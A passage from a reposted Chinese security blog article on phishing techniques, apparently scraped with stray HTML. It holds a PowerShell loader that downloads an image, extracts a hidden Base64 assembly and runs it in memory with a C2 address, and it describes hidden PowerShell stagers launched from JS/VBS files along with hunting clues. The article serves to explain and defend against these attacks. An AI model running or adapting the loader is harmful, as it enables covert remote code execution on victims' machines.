文章总结: 本文系统剖析了网络钓鱼的多种攻击手段,涵盖基于Office宏与扩展名伪装的文件钓鱼、HTA恶意代码执行、NTLM中继攻击及图像隐写术载荷投递。文中结合代码示例详细展示了攻击原理与流程,建议用户提高警惕并及时更新补丁,采用多维度防护措施以应对安全威胁。 综合评分: 91 文章分类: 社会工程学,渗透测试,红队,实战经验,恶意软件
$img = (New-Object Net.WebClient).DownloadString($Url)
$start = $img.IndexOf($StartM)
$end = $img.IndexOf($EndM)
if($start -lt 0 -or $end -lt 0 -or $end -le $start){ throw 'markers not found' }
$b64 = $img.Substring($start + $StartM.Length, $end - ($start + $StartM.Length))
$bytes = [Convert]::FromBase64String($b64)
$asm = [Reflection.Assembly]::Load($bytes)
$type = $asm.GetType($EntryType)
$method = $type.GetMethod($EntryMeth, [Reflection.BindingFlags] 'Public,Static,NonPublic')
$null = $method.Invoke($null, @($C2, $env:PROCESSOR_ARCHITECTURE))
</code></pre>
<p>这种利用隐写术在图像中隐藏恶意载荷的方式,极大地增加了检测难度,攻击者通过多个阶段的复杂操作,逐步实现恶意代码的执行和控制。</p>
<h3 id=)
0x0402 JS/VBS 脚本提取器与 Base64 PowerShell 暂存环境
反复出现的初始阶段是高度混淆的.js 或.vbs 文件封装在压缩包中,其目的是解码嵌入的 Base64 字符串,启动 PowerShell 以 -nop -w hidden -ep bypass 通过 HTTPS 引导下一阶段。骨架逻辑为读取自身文件内容,在无意义字符串间找到 Base64 编码数据块,解码为 ASCII PowerShell,使用 wscript.exe 或 cscript.exe 调用执行 powershell.exe。狩猎线索包括 powershell.exe 使用命令行中的 -enc/生成已归档的 JS/VBS 附件,wscript.exe 从用户临时路径启动 powershell.exe -nop -w hidden。这种方式通过多层混淆和隐藏,使恶意脚本在用户系统中悄然运行,给用户带来潜在的安全风险。
网络钓鱼方法层出不穷且日益复杂,攻击者不断利用各种技术手段绕过安全防护,窃取用户信息或获取系统权限。用户和企业必须提高警惕,加强安全意识,采用多维度的安全防护措施,如安装杀毒软件、及时更新系统和软件补丁、谨慎处理可疑文件和链接等,以应对这些无形的网络威胁。同时,安全研究人员也需持续关注网络钓鱼技术的发展,不断优化检测和防范机制,保障网络空间的安全与稳定。
END
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:网络侦查研究院 子午猫 子午猫《网络钓鱼攻击手段》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。
评论